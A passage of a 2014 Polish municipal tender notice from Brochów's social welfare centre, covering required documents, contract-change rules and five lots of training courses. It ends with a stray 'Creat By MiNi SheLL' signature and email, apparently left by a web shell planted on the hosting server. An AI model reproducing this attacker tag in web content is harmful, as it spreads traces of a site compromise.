<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/Oferta sporządzona na druku Oferta Wykonawcy wg załącznika nr 1 do SIWZ.
2/Jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. W tym celu załącza: Zobowiązanie podmiotu do udostępnienia Wykonawcy wiedzy i doświadczenia, osób zdolnych do wykonania zamówienia, sprzętu, potencjału technicznego, materiałów, zdolności finansowej  do wykonania zamówienia na okres korzystania z nich przy wykonaniu zamówienia.- wg zał. nr 10 do SIWZ. Zamawiający dopuszcza złożenie oryginału lub kopii tego dokumentu, z tym, że: składany oryginał dokumentu musi być podpisany przez podmiot udzielający zasobów, a składana kopia dokumentu oryginalnego musi być poświadczona notarialnie. 3/Jeżeli Wykonawcę/ Wykonawców reprezentuje Pełnomocnik - Pełnomocnictwo, określające zakres umocowania /w formie oryginału lub kopii  poświadczonej  za zgodność z oryginałem przez notariusza/ podpisane przez osobę/osoby uprawnione do reprezentacji Wykonawcy/ Wykonawców 4/Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy /Wykonawców, jeżeli Wykonawca /Wykonawcy nie posiadają wpisu do Krajowego Rejestru Sądowego.5/W przypadku wnoszenia oferty przez Wykonawców występujących wspólnie /konsorcja, spółki cywilne/ wykonawcy muszą złożyć dokumenty, o których mowa w pkt III.4.1 i III.4.2 tego ogłoszenia o zamówieniu, a o ile to ich dotyczy to również dokumenty wymienione w pkt III.4.3 tego ogłoszenia, z tym, że dokumenty wymienione w punkcie III.4.2 i odpowiednio III.4.3 tego ogłoszenia należy złożyć od każdego Wykonawcy. Oświadczenie, o którym mowa w pkt 1 muszą złożyć wszyscy ubiegający się wykonawcy odrębnie lub wspólnie.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1/Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy, na podstawie art. 93 pkt 1 ust. 6, art. 144 ust. 1 i art. 145 ust. 1 ustawy, które zostały wymienione w następujących rozdziałach SIWZ: 2 /w p. 2.10, 2.11 i 2.12/, 3  /w p. 3.5.2/ i 16 . 2/Szkolenia mogą być prowadzone wyłącznie przez osoby wskazane w Ofercie Wykonawcy. Zmiana osoby wskazanej w ofercie Wykonawcy na etapie realizacji zamówienia wymaga spełnienia łącznie 2 warunków: a) Wykonawca wykaże, że wskazana nowa osoba posiada minimum takie samo wykształcenie i doświadczenie jak osoba wskazana w Ofercie Wykonawcy; b) Zamawiający udzieli Wykonawcy pisemnej zgody na zmianę tej osoby.3/Mogą ulec zmianie terminy realizacji poszczególnych zadań /np. z powodu przedłużającego się postępowania lub z powodu choroby, zdarzenia losowego/  oraz liczba Uczestników Projektu /np. w wyniku rezygnacji uczestników z powodu choroby, zdarzenia losowego, lub w wyniku zgłoszenia się dodatkowych osób/, z tym że  zmniejszenie i/lub zwiększenie ilości uczestników poszczególnych szkoleń/ kursów dopuszczalne jest w zakresie nie większym, niż o dwie osoby.4.Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadku, gdy:a) Wykonawca:- nie rozpocznie realizacji zamówienia w terminie  uzgodnionym z Zamawiającym - realizuje usługi przewidziane niniejszą umową w sposób niezgodny z wymogami Zamawiającego,-  przerwie realizację zamówienia i przerwa ta będzie trwała dłużej niż 3 dni,  - powierzy osobie trzeciej wykonanie zobowiązań wynikających z umowy b) wystąpi istotna zmiana okoliczności powodująca, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy - odstąpienie od umowy na podstawie art. 145 ust. 1 PZP może nastąpić w terminie miesiąca od powzięcia wiadomości o powyższych okolicznościach.  W takim przypadku Wykonawcy przysługuje wynagrodzenie należne z tytułu wykonania części umowy potwierdzonej wpisem w protokole odbioru.5/Strony umowy zastrzegają  sobie prawo  do zmiany  postanowień umowy  w przypadkach:a)Zmian w przepisach prawa lub wykładni  jego przepisów.
b) Zajścia okoliczności, na  które   strony nie miały wpływu, a dotyczące zaniechania działania osób trzecich i/lub organów w stosunku do okoliczności  towarzyszących zawarciu umowy, a wpływających  obiektywnie  bezpośrednio lub pośrednio w sposób dalece utrudniający lub czyniący niemożliwym spełnienie świadczeń  stron umowy w sposób określony pierwotnie  w niniejszej umowie 6/W przypadku przerwania  lub wstrzymania  realizacji zamówienia  z przyczyn  nie leżących po stronie    
Wykonawcy, Wykonawca - po udokumentowaniu tych przyczyn- może skorzystać  z uprawnienia  do zmiany terminu  zakończenia  realizacji zadania.
W przypadku rezygnacji bądź wykreślenia osoby/osób z listy Uczestników szkolenia/kursu Zamawiający może - w uzasadnionej sytuacji  - skierować na szkolenie/kurs inną osobę/ inne osoby.7/Warunki zmian: Inicjowanie zmian na wniosek Zamawiającego lub Wykonawcy;Uzasadnienie zmian  - zabezpieczenie prawidłowej realizacji przedmiotu umowy, dostosowanie realizacji do zmiany przepisów prawnych, zabezpieczenie interesów Zamawiającego, czynniki zewnętrzne, itp. Forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brochow.bip.org.pl -> zakładka Menu podmiotowe ->Gminny Ośrodek Pomocy Społecznej ->przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej /pokój numer 6/, Brochów 125, 05-088 Brochów..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2014 godzina 11:00, miejsce: Gminny Ośrodek Pomocy Społecznej, pokój numer 6 Brochów 125, 05-088 Brochów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pt.Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 7.1,Poddziałanie 7.1.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Społeczna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Społeczna w jednej edycji dla 12 Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Zawodowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia Aktywna Integracja Zawodowa w jednej edycji dla 16 Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu Układanie kostki brukowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu Układanie kostki brukowej  w jednej edycji dla 8 Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych z napędem silnikowym, w tym bezpieczna wymiana butli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu Kierowca wózków jezdniowych z napędem silnikowym w jednej edycji dla 12 Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu Florystyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu Florystyka w jednej edycji dla 10 Uczestników Projektu systemowego pt. Re/integracja osób wykluczonych/zagrożonych wykluczeniem społecznym na terenie gminy Brochów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com